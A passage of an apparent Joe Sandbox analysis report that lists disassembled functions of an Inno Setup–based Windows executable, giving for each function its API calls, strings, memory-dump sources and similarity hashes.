                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1694776339-0
                                                                                                                                                                                                                                  • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                                                                                                  • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004221E8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$Delete$EnableItem$System
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3985193851-0
                                                                                                                                                                                                                                  • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                                                                                                                                                  • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00481854 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(000104B0,00000496,00002710,00000000), ref: 00481A97
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • DeinitializeSetup, xrefs: 0048190D
                                                                                                                                                                                                                                  • Restarting Windows., xrefs: 00481A72
                                                                                                                                                                                                                                  • Deinitializing Setup., xrefs: 00481872
                                                                                                                                                                                                                                  • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                                                                                                                                                                  • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeLibrary$MessageNotifySend
                                                                                                                                                                                                                                  • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                                                                                                                                                  • API String ID: 3817813901-1884538726
                                                                                                                                                                                                                                  • Opcode ID: 465e20e9b424049c750abeefdcaa0399268f60af279eeffeb6245f27988e7504
                                                                                                                                                                                                                                  • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 465e20e9b424049c750abeefdcaa0399268f60af279eeffeb6245f27988e7504
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046168C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0046172B
                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                                                                                                                                                                  • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                                                                                                                                                                  • 756CD120.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
                                                                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                                                                  • API String ID: 2698730301-3554254475
                                                                                                                                                                                                                                  • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                                                                                                                                                  • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004729F8 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                                                                                                                                                                    • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                                                                                                                                                                    • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                                                                                                                                                  • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                                                                                                                                                  • API String ID: 884541143-1710247218
                                                                                                                                                                                                                                  • Opcode ID: eae8990b6dfb44545e31b666042918a45f1fae412ad7defa904a2210dacbb06f
                                                                                                                                                                                                                                  • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eae8990b6dfb44545e31b666042918a45f1fae412ad7defa904a2210dacbb06f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045D2B4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                  • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                                                                                                                                                  • API String ID: 190572456-3516654456
                                                                                                                                                                                                                                  • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                                                                                                                                                  • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A8DC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                                                                                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$StretchText
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2984075790-0
                                                                                                                                                                                                                                  • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                                                                                                                                                  • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004580C4 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseDirectoryHandleSystem
                                                                                                                                                                                                                                  • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                                                                                                                                                  • API String ID: 2051275411-1862435767
                                                                                                                                                                                                                                  • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                                                                                                                                                  • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0044D178 Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                                                                                                                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Text$Color$Draw$OffsetRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1005981011-0
                                                                                                                                                                                                                                  • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                                                                                                                                  • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041B66C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0041B745
                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 0041B751
                                                                                                                                                                                                                                  • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                                                                                                                                                                  • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                                                                                                                                                                  • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                                                                                                                                                                  • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                                                                                                                                                  • String ID: %H
                                                                                                                                                                                                                                  • API String ID: 3275473261-1959103961
                                                                                                                                                                                                                                  • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                                                                                                                                                  • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041B93C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0041BA17
                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 0041BA23
                                                                                                                                                                                                                                  • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                                                                                                                                                                  • RealizePalette.GDI32(00000000), ref: 0041BA69
